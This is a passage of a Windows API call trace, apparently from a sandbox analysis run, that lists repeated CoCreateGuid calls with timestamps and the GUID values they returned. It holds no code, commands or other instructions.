[6]=0xf, [7]=0xc7))) returned 0x0 [0181.547] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x21fbee2f, Data2=0x223f, Data3=0x4d6c, Data4=([0]=0xb8, [1]=0xc0, [2]=0x97, [3]=0x5c, [4]=0xe9, [5]=0xf6, [6]=0x3, [7]=0x54))) returned 0x0 [0181.548] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x97cd4399, Data2=0x4f8c, Data3=0x44c8, Data4=([0]=0x88, [1]=0xe, [2]=0x6d, [3]=0x5, [4]=0xd6, [5]=0x74, [6]=0xd4, [7]=0x12))) returned 0x0 [0181.548] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x8aed1899, Data2=0x6b9c, Data3=0x4039, Data4=([0]=0xae, [1]=0xda, [2]=0x25, [3]=0x9f, [4]=0x2a, [5]=0x16, [6]=0x1b, [7]=0xa0))) returned 0x0 [0181.549] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x7383de4e, Data2=0xd463, Data3=0x47fa, Data4=([0]=0xb7, [1]=0x2e, [2]=0xf2, [3]=0x4a, [4]=0xb3, [5]=0x33, [6]=0x84, [7]=0xf6))) returned 0x0 [0181.550] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xc1158b62, Data2=0x7539, Data3=0x4a97, Data4=([0]=0xb9, [1]=0xdf, [2]=0x15, [3]=0x23, [4]=0xb6, [5]=0x8e, [6]=0x9b, [7]=0xa9))) returned 0x0 [0181.551] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x429a5270, Data2=0x30c, Data3=0x4233, Data4=([0]=0x9b, [1]=0xca, [2]=0x67, [3]=0x93, [4]=0xfa, [5]=0xd5, [6]=0x3e, [7]=0xd1))) returned 0x0 [0181.552] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x21d95519, Data2=0x41fd, Data3=0x4af8, Data4=([0]=0x8a, [1]=0x66, [2]=0xd2, [3]=0x4d, [4]=0xb5, [5]=0x6b, [6]=0xdd, [7]=0xc6))) returned 0x0 [0181.553] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x7510696e, Data2=0xe8fb, Data3=0x4644, Data4=([0]=0x88, [1]=0x89, [2]=0x96, [3]=0x81, [4]=0xcf, [5]=0x17, [6]=0x24, [7]=0x8c))) returned 0x0 [0181.554] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x348d8edf, Data2=0xadc7, Data3=0x4b56, Data4=([0]=0x99, [1]=0x66, [2]=0xa3, [3]=0xcb, [4]=0x36, [5]=0x5e, [6]=0x8f, [7]=0xf6))) returned 0x0 [0181.555] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xf47ac21, Data2=0x33cc, Data3=0x4546, Data4=([0]=0x83, [1]=0x43, [2]=0x9a, [3]=0x5c, [4]=0xf8, [5]=0x81, [6]=0x7b, [7]=0xbd))) returned 0x0 [0181.557] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x7cefa8ba, Data2=0x6d31, Data3=0x40fc, Data4=([0]=0x9a, [1]=0x6f, [2]=0x6, [3]=0x2c, [4]=0x80, [5]=0xf7, [6]=0xb, [7]=0x9e))) returned 0x0 [0181.558] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x82f6b9c0, Data2=0xf97e, Data3=0x4eea, Data4=([0]=0x87, [1]=0x6, [2]=0xc5, [3]=0x13, [4]=0xc8, [5]=0x2e, [6]=0xc0, [7]=0x66))) returned 0x0 [0181.559] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x87521259, Data2=0xe47, Data3=0x4394, Data4=([0]=0x9b, [1]=0xfb, [2]=0x67, [3]=0x5, [4]=0x65, [5]=0x95, [6]=0xc1, [7]=0x30))) returned 0x0 [0181.560] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x7b8cb641, Data2=0xf630, Data3=0x475b, Data4=([0]=0xac, [1]=0xa7, [2]=0x91, [3]=0xe9, [4]=0xb5, [5]=0x76, [6]=0x20, [7]=0xf5))) returned 0x0 [0181.561] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xc39a32c9, Data2=0x960b, Data3=0x4a48, Data4=([0]=0x83, [1]=0x29, [2]=0x22, [3]=0xc2, [4]=0x15, [5]=0x97, [6]=0x47, [7]=0xf3))) returned 0x0 [0181.562] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xe952f26d, Data2=0x7dd5, Data3=0x4751, Data4=([0]=0x91, [1]=0x4f, [2]=0xcf, [3]=0x4a, [4]=0x6e, [5]=0x9b, [6]=0x4b, [7]=0xf2))) returned 0x0 [0181.562] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xecd04587, Data2=0x9089, Data3=0x4813, Data4=([0]=0xaf, [1]=0x7b, [2]=0x2c, [3]=0xbe, [4]=0x62, [5]=0x8, [6]=0xf9, [7]=0xdd))) returned 0x0 [0181.564] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x1fa92fd2, Data2=0x2f4b, Data3=0x4403, Data4=([0]=0x99, [1]=0x29, [2]=0xce, [3]=0x16, [4]=0x1a, [5]=0xfb, [6]=0x5c, [7]=0xc9))) returned 0x0 [0181.565] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x1986b856, Data2=0x9235, Data3=0x4085, Data4=([0]=0x8d, [1]=0x8a, [2]=0x3e, [3]=0x5f, [4]=0x6d, [5]=0x38, [6]=0xa0, [7]=0xd))) returned 0x0 [0181.566] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x8aef0b2e, Data2=0xbc5b, Data3=0x4d63, Data4=([0]=0x9e, [1]=0xbf, [2]=0xd5, [3]=0x1c, [4]=0xc5, [5]=0xdf, [6]=0xc7, [7]=0x57))) returned 0x0 [0181.567] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x473616be, Data2=0xa9d0, Data3=0x4e24, Data4=([0]=0xa1, [1]=0xd2, [2]=0x1b, [3]=0x24, [4]=0xda, [5]=0x32, [6]=0xba, [7]=0x93))) returned 0x0 [0181.568] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xfff04342, Data2=0x4f5d, Data3=0x4d32, Data4=([0]=0x96, [1]=0xca, [2]=0x79, [3]=0x83, [4]=0x3e, [5]=0x71, [6]=0x7a, [7]=0xc0))) returned 0x0 [0181.569] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xece1a889, Data2=0xf624, Data3=0x43cb, Data4=([0]=0x86, [1]=0x68, [2]=0x7f, [3]=0xfc, [4]=0x11, [5]=0x83, [6]=0xb8, [7]=0xa5))) returned 0x0 [0181.703] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xf85ca419, Data2=0x6e93, Data3=0x48d6, Data4=([0]=0xac, [1]=0x84, [2]=0x80, [3]=0x82, [4]=0xd8, [5]=0x9, [6]=0x29, [7]=0x8b))) returned 0x0 [0181.704] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x4f2a1286, Data2=0x9ffb, Data3=0x45ab, Data4=([0]=0x81, [1]=0xb5, [2]=0xc0, [3]=0x74, [4]=0x20, [5]=0xc9, [6]=0x74, [7]=0x53))) returned 0x0 [0181.705] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x7797ab83, Data2=0xb95e, Data3=0x480f, Data4=([0]=0x97, [1]=0x23, [2]=0xca, [3]=0x80, [4]=0x9d, [5]=0x2f, [6]=0xf4, [7]=0xca))) returned 0x0 [0181.706] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xc7fda6b8, Data2=0xd6bb, Data3=0x4c5c, Data4=([0]=0xa7, [1]=0xdf, [2]=0x84, [3]=0xd3, [4]=0x11, [5]=0xaa, [6]=0x2a, [7]=0x60))) returned 0x0 [0181.707] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xfa6c82c9, Data2=0xbc7e, Data3=0x4f10, Data4=([0]=0x86, [1]=0x47, [2]=0xfb, [3]=0x47, [4]=0x7d, [5]=0x97, [6]=0xa8, [7]=0x5b))) returned 0x0 [0181.708] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x1f98db6d, Data2=0x6f39, Data3=0x4283, Data4=([0]=0x9b, [1]=0x10, [2]=0xdc, [3]=0x1, [4]=0xa8, [5]=0x36, [6]=0x24, [7]=0xd6))) returned 0x0 [0181.709] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xa6a0318b, Data2=0xb26, Data3=0x4a45, Data4=([0]=0xab, [1]=0x21, [2]=0x4a, [3]=0x7, [4]=0xeb, [5]=0xd9, [6]=0xe6, [7]=0x47))) returned 0x0 [0181.711] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xb5df2ed6, Data2=0x791c, Data3=0x4f53, Data4=([0]=0x8b, [1]=0x60, [2]=0x9c, [3]=0x87, [4]=0x4, [5]=0xb2, [6]=0xea, [7]=0x88))) returned 0x0 [0181.711] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x2e418642, Data2=0x1509, Data3=0x41b1, Data4=([0]=0x9a, [1]=0x98, [2]=0x23, [3]=0x68, [4]=0x78, [5]=0xb6, [6]=0xff, [7]=0x4c))) returned 0x0 [0181.712] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xdd3244eb, Data2=0x6d68, Data3=0x4131, Data4=([0]=0xaf, [1]=0xf4, [2]=0x8b, [3]=0xab, [4]=0xfc, [5]=0x3e, [6]=0x3f, [7]=0xfc))) returned 0x0 [0181.714] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x9e5a2169, Data2=0x85cc, Data3=0x4de7, Data4=([0]=0xbf, [1]=0x1b, [2]=0x67, [3]=0xd4, [4]=0xf6, [5]=0x9c, [6]=0xc1, [7]=0x79))) returned 0x0 [0181.714] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x32c6cf1b, Data2=0x8ed1, Data3=0x4647, Data4=([0]=0x88, [1]=0x9e, [2]=0xc9, [3]=0xc5, [4]=0xe0, [5]=0xc2, [6]=0x29, [7]=0x62))) returned 0x0 [0181.715] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xd3908a08, Data2=0x69c0, Data3=0x4d6e, Data4=([0]=0x86, [1]=0x12, [2]=0xf4, [3]=0xc5, [4]=0x20, [5]=0x44, [6]=0x95, [7]=0xbd))) returned 0x0 [0181.715] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x1b47e904, Data2=0x5d99, Data3=0x413b, Data4=([0]=0x9a, [1]=0xc2, [2]=0xe2, [3]=0xd3, [4]=0x4e, [5]=0x1, [6]=0xce, [7]=0xa3))) returned 0x0 [0181.716] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xb27e0ddd, Data2=0x3fa9, Data3=0x43b1, Data4=([0]=0x9a, [1]=0x5f, [2]=0xf7, [3]=0x87, [4]=0xa2, [5]=0xbf, [6]=0x8d, [7]=0x0))) returned 0x0 [0181.717] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x5b0e6721, Data2=0x9cd9, Data3=0x4b3e, Data4=([0]=0x90, [1]=0x99, [2]=0x66, [3]=0xcc, [4]=0x59, [5]=0xdc, [6]=0x57, [7]=0x41))) returned 0x0 [0181.718] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x17833600, Data2=0x4347, Data3=0x4b7d, Data4=([0]=0x91, [1]=0x1, [2]=0x0, [3]=0x11, [4]=0xc4, [5]=0x42, [6]=0xc2, [7]=0xc))) returned 0x0 [0181.719] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x53dec219, Data2=0x5ad4, Data3=0x4465, Data4=([0]=0xb9, [1]=0x24, [2]=0x9b, [3]=0x38, [4]=0x76, [5]=0x7d, [6]=0x27, [7]=0x73))) returned 0x0 [0181.719] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x7c1e7f6e, Data2=0xcaf2, Data3=0x4b5f, Data4=([0]=0xa6, [1]=0x4, [2]=0xd6, [3]=0xff, [4]=0x9a, [5]=0x57, [6]=0x52, [7]=0x51))) returned 0x0 [0181.720] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x39678383, Data2=0xf11a, Data3=0x405e, Data4=([0]=0x8b, [1]=0x5f, [2]=0xf1, [3]=0x49, [4]=0xbd, [5]=0xb5, [6]=0x25, [7]=0x17))) returned 0x0 [0181.721] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xa33e1482, Data2=0x8128, Data3=0x4272, Data4=([0]=0xa3, [1]=0x1e, [2]=0x6d, [3]=0x93, [4]=0x80, [5]=0x86, [6]=0x6a, [7]=0x2c))) returned 0x0 [0181.724] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xfa161a3, Data2=0xd81a, Data3=0x4803, Data4=([0]=0x95, [1]=0x55, [2]=0xc4, [3]=0xab, [4]=0x3e, [5]=0x78, [6]=0x70, [7]=0xcd))) returned 0x0 [0181.724] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xe040ec4b, Data2=0xc29d, Data3=0x418e, Data4=([0]=0xa0, [1]=0x7c, [2]=0xfb, [3]=0x27, [4]=0x17, [5]=0x5b, [6]=0x4f, [7]=0x63))) returned 0x0 [0181.725] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x9dbb0bd7, Data2=0x7b7c, Data3=0x46d4, Data4=([0]=0x96, [1]=0x7d, [2]=0xfd, [3]=0xb2, [4]=0xe0, [5]=0xdd, [6]=0x66, [7]=0x3c))) returned 0x0 [0181.725] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xe996ccc3, Data2=0xe870, Data3=0x4141, Data4=([0]=0xbc, [1]=0x60, [2]=0x14, [3]=0xaa, [4]=0x5, [5]=0xe7, [6]=0x40, [7]=0x84))) returned 0x0 [0181.726] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xefd2a64f, Data2=0x7223, Data3=0x4898, Data4=([0]=0xa1, [1]=0x87, [2]=0xc2, [3]=0xae, [4]=0xa, [5]=0x45, [6]=0xcc, [7]=0x86))) returned 0x0 [0181.726] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x7a7e45ce, Data2=0x2360, Data3=0x44d1, Data4=([0]=0xb3, [1]=0xc8, [2]=0x82, [3]=0xff, [4]=0xd0, [5]=0x9a, [6]=0xf3, [7]=0x4c))) returned 0x0 [0181.729] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x5d9d9cb, Data2=0xa498, Data3=0x4963, Data4=([0]=0x8a, [1]=0xb5, [2]=0x9, [3]=0xbf, [4]=0x5d, [5]=0x5a, [6]=0x54, [7]=0x11))) returned 0x0 [0181.729] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xdd4c6f81, Data2=0x3fef, Data3=0x4ca9, Data4=([0]=0xa4, [1]=0x8d, [2]=0x15, [3]=0x4b, [4]=0xf5, [5]=0x79, [6]=0x46, [7]=0x2e))) returned 0x0 [0181.730] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x3e41df4f, Data2=0x8354, Data3=0x468a, Data4=([0]=0xae, [1]=0xa1, [2]=0x8b, [3]=0xc4, [4]=0xab, [5]=0x17, [6]=0xf3, [7]=0x1b))) returned 0x0 [0181.730] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x16360703, Data2=0xd1da, Data3=0x453e, Data4=([0]=0x8f, [1]=0x30, [2]=0xef, [3]=0x19, [4]=0x8d, [5]=0xf4, [6]=0x78, [7]=0x95))) returned 0x0 [0181.731] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xe2220c6a, Data2=0x3d35, Data3=0x46a0, Data4=([0]=0xb8, [1]=0xe3, [2]=0xeb, [3]=0x73, [4]=0x7f, [5]=0xe4, [6]=0xd3, [7]=0x7b))) returned 0x0 [0182.075] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x73b666ac, Data2=0x48a4, Data3=0x465e, Data4=([0]=0x90, [1]=0xe9, [2]=0x3a, [3]=0x40, [4]=0x52, [5]=0xed, [6]=0xed, [7]=0x35))) returned 0x0 [0182.081] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xc2b5d8ed, Data2=0xf5b2, Data3=0x4f17, Data4=([0]=0xa3, [1]=0xe2, [2]=0x9f, [3]=0xe2, [4]=0xd7, [5]=0x84, [6]=0x93, [7]=0x5f))) returned 0x0 [0182.088] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x7b9fae40, Data2=0x43fe, Data3=0x43b3, Data4=([0]=0x9d, [1]=0xb0, [2]=0x66, [3]=0x4e, [4]=0xe1, [5]=0x24, [6]=0x8c, [7]=0x99))) returned 0x0 [0182.097] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x9a2fc88d, Data2=0x60e3, Data3=0x4922, Data4=([0]=0x84, [1]=0xdc, [2]=0xc5, [3]=0x97, [4]=0xb, [5]=0x55, [6]=0x44, [7]=0xd9))) returned 0x0 [0182.220] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x920bf323, Data2=0xc04, Data3=0x4314, Data4=([0]=0x99, [1]=0x7b, [2]=0x47, [3]=0xc5, [4]=0xd7, [5]=0x22, [6]=0x4b, [7]=0x3a))) returned 0x0 [0182.224] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x712f0e4b, Data2=0xc99f, Data3=0x4b06, Data4=([0]=0xa2, [1]=0xbd, [2]=0x54, [3]=0x3, [4]=0xfe, [5]=0x55, [6]=0x97, [7]=0x93))) returned 0x0 [0182.335] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x45018f56, Data2=0xf359, Data3=0x4d6d, Data4=([0]=0xa8, [1]=0x5, [2]=0x0, [3]=0x59, [4]=0x2b, [5]=0xf9, [6]=0xdf, [7]=0xbb))) returned 0x0 [0182.338] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x34c12f5a, Data2=0x3b8b, Data3=0x46b5, Data4=([0]=0x87, [1]=0xde, [2]=0xad, [3]=0xf6, [4]=0x70, [5]=0xd4, [6]=0x3b, [7]=0xdb))) returned 0x0 [0182.339] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xa140010e, Data2=0x2a5, Data3=0x4b95, Data4=([0]=0x86, [1]=0x19, [2]=0x3c, [3]=0xf8, [4]=0x4b, [5]=0xdc, [6]=0x46, [7]=0x7d))) returned 0x0 [0182.340] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x516b393f, Data2=0x6ad8, Data3=0x436b, Data4=([0]=0x87, [1]=0x80, [2]=0xda, [3]=0xf, [4]=0x64, [5]=0xdb, [6]=0xd8, [7]=0x5e))) returned 0x0 [0182.342] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x2cb83584, Data2=0x8fab, Data3=0x4078, Data4=([0]=0x88, [1]=0x9f, [2]=0x6f, [3]=0xe, [4]=0xad, [5]=0x82, [6]=0x2a, [7]=0x94))) returned 0x0 [0182.343] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x82deb5e1, Data2=0x8e2e, Data3=0x44b8, Data4=([0]=0x88, [1]=0xf8, [2]=0x38, [3]=0xb0, [4]=0xd7, [5]=0x51, [6]=0xbc, [7]=0xbd))) returned 0x0 [0182.345] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x91c53212, Data2=0x50ae, Data3=0x46d6, Data4=([0]=0xa6, [1]=0xc8, [2]=0xed, [3]=0x3a, [4]=0xd, [5]=0x73, [6]=0xc5, [7]=0xf5))) returned 0x0 [0182.346] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x66ef9e43, Data2=0x8257, Data3=0x474a, Data4=([0]=0x9a, [1]=0xfd, [2]=0x86, [3]=0x84, [4]=0xec, [5]=0xcd, [6]=0xae, [7]=0x97))) returned 0x0 [0182.348] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x3a3ea02f, Data2=0xac6d, Data3=0x4fd3, Data4=([0]=0xb3, [1]=0x6d, [2]=0x16, [3]=0xcb, [4]=0x5a, [5]=0xc, [6]=0x36, [7]=0x13))) returned 0x0 [0182.349] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x3caea229, Data2=0x8648, Data3=0x4b62, Data4=([0]=0xa8, [1]=0x6a, [2]=0x64, [3]=0x9a, [4]=0xb1, [5]=0xd0, [6]=0xb4, [7]=0x13))) returned 0x0 [0182.350] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x8237474e, Data2=0x491e, Data3=0x4d02, Data4=([0]=0xb1, [1]=0x3e, [2]=0xe2, [3]=0xf7, [4]=0x1a, [5]=0xb1, [6]=0xb2, [7]=0x54))) returned 0x0 [0182.351] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x556a4fce, Data2=0x6f83, Data3=0x41ee, Data4=([0]=0xbc, [1]=0xb5, [2]=0xf2, [3]=0x20, [4]=0xf8, [5]=0xc2, [6]=0x36, [7]=0x65))) returned 0x0 [0182.353] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xfb8493, Data2=0xae4c, Data3=0x473a, Data4=([0]=0x90, [1]=0x94, [2]=0x44, [3]=0x2f, [4]=0xd5, [5]=0xd7, [6]=0x58, [7]=0x8))) returned 0x0 [0182.355] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xb978e9ed, Data2=0x5966, Data3=0x4ffb, Data4=([0]=0x81, [1]=0x17, [2]=0xb0, [3]=0x70, [4]=0x9b, [5]=0x90, [6]=0xfb, [7]=0xec))) returned 0x0 [0182.357] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x93552bb5, Data2=0x94d0, Data3=0x4afb, Data4=([0]=0xbc, [1]=0xb7, [2]=0xdf, [3]=0x15, [4]=0x45, [5]=0x7b, [6]=0x4c, [7]=0x1e))) returned 0x0 [0182.358] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xa5813455, Data2=0xaaec, Data3=0x4cac, Data4=([0]=0xab, [1]=0x33, [2]=0x95, [3]=0x2a, [4]=0xb3, [5]=0x3a, [6]=0x72, [7]=0x0))) returned 0x0 [0182.359] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x1e4ca2be, Data2=0x9576, Data3=0x4738, Data4=([0]=0xa2, [1]=0xfe, [2]=0x79, [3]=0x35, [4]=0x73, [5]=0xcc, [6]=0x50, [7]=0xb2))) returned 0x0 [0182.360] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x3672afc1, Data2=0x70e, Data3=0x4297, Data4=([0]=0x82, [1]=0xf2, [2]=0x23, [3]=0xcf, [4]=0x31, [5]=0xd9, [6]=0x5a, [7]=0x90))) returned 0x0 [0182.361] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xdaaab11c, Data2=0x4d42, Data3=0x4284, Data4=([0]=0x88, [1]=0xa0, [2]=0x96, [3]=0x5, [4]=0x1c, [5]=0xf3, [6]=0xe3, [7]=0x85))) returned 0x0 [0182.366] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x5f0067a3, Data2=0xae38, Data3=0x4330, Data4=([0]=0xad, [1]=0x72, [2]=0xe6, [3]=0xe2, [4]=0xc0, [5]=0x83, [6]=0xb2, [7]=0x8d))) returned 0x0 [0182.368] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xca536a1d, Data2=0x713c, Data3=0x4226, Data4=([0]=0x82, [1]=0x75, [2]=0x6e, [3]=0x42, [4]=0x76, [5]=0x46, [6]=0xd5, [7]=0xd1))) returned 0x0 [0182.436] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x9b63ed14, Data2=0xfdd7, Data3=0x4611, Data4=([0]=0x97, [1]=0xb3, [2]=0xf1, [3]=0x64, [4]=0x0, [5]=0x8e, [6]=0x18, [7]=0x6f))) returned 0x0 [0182.439] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x1ab2b365, Data2=0xade4, Data3=0x48f8, Data4=([0]=0xae, [1]=0x4f, [2]=0x1, [3]=0x16, [4]=0x96, [5]=0x3, [6]=0x9c, [7]=0x69))) returned 0x0 [0182.440] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x9b1c073c, Data2=0xbef8, Data3=0x47ef, Data4=([0]=0x96, [1]=0x32, [2]=0x4c, [3]=0x2, [4]=0xcc, [5]=0x69, [6]=0x33, [7]=0x5b))) returned 0x0 [0182.441] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x7f4a567a, Data2=0x5d53, Data3=0x4dfd, Data4=([0]=0x93, [1]=0xd, [2]=0xbb, [3]=0xd6, [4]=0xed, [5]=0x7d, [6]=0x5e, [7]=0x10))) returned 0x0 [0182.442] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xb22bf757, Data2=0x61c0, Data3=0x4b1a, Data4=([0]=0x96, [1]=0x5b, [2]=0xcc, [3]=0xa4, [4]=0xd1, [5]=0x92, [6]=0xa4, [7]=0x7d))) returned 0x0 [0182.443] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xf2bde0d1, Data2=0xb714, Data3=0x4f31, Data4=([0]=0x9b, [1]=0x6a, [2]=0x15, [3]=0xf9, [4]=0x41, [5]=0x14, [6]=0x4, [7]=0x24))) returned 0x0 [0182.444] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xf2626a59, Data2=0x482f, Data3=0x4921, Data4=([0]=0xaa, [1]=0xd8, [2]=0x9a, [3]=0x12, [4]=0x6f, [5]=0x1f, [6]=0x82, [7]=0x5c))) returned 0x0 [0182.446] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x82c7e847, Data2=0xb6d1, Data3=0x4520, Data4=([0]=0x83, [1]=0x7, [2]=0x22, [3]=0x18, [4]=0xd8, [5]=0x76, [6]=0x60, [7]=0x93))) returned 0x0 [0182.448] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xff8467e6, Data2=0x4b1a, Data3=0x49fa, Data4=([0]=0x86, [1]=0x78, [2]=0xc8, [3]=0x76, [4]=0xdf, [5]=0x22, [6]=0xf, [7]=0x52))) returned 0x0 [0182.449] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x63978195, Data2=0xd650, Data3=0x4a63, Data4=([0]=0xa3, [1]=0xce, [2]=0x86, [3]=0x36, [4]=0x33, [5]=0x7e, [6]=0x27, [7]=0xc0))) returned 0x0 [0182.449] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xd9e45435, Data2=0xd4f3, Data3=0x40c1, Data4=([0]=0x8b, [1]=0xdf, [2]=0xdd, [3]=0xe2, [4]=0xe8, [5]=0x4b, [6]=0x49, [7]=0xa9))) returned 0x0 [0182.450] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x820393ab, Data2=0xc9a6, Data3=0x47bf, Data4=([0]=0xa0, [1]=0xc8, [2]=0x4e, [3]=0xfc, [4]=0x40, [5]=0xdf, [6]=0x30, [7]=0x2a))) returned 0x0 [0182.451] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xe5f2dfea, Data2=0xf0ca, Data3=0x481d, Data4=([0]=0xab, [1]=0x80, [2]=0x2e, [3]=0x8, [4]=0x3e, [5]=0xc, [6]=0xfd, [7]=0x96))) returned 0x0 [0182.454] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x3fd2d5a5, Data2=0x3962, Data3=0x493d, Data4=([0]=0x87, [1]=0xc3, [2]=0xcb, [3]=0x48, [4]=0x93, [5]=0x34, [6]=0x65, [7]=0xfd))) returned 0x0 [0182.455] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x44f13935, Data2=0x3e08, Data3=0x4baa, Data4=([0]=0x92, [1]=0x81, [2]=0xe5, [3]=0x40, [4]=0x65, [5]=0x2d, [6]=0xae, [7]=0xac))) returned 0x0 [0182.455] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x6b65ab4c, Data2=0x2686, Data3=0x4ec2, Data4=([0]=0xbd, [1]=0x2e, [2]=0x80, 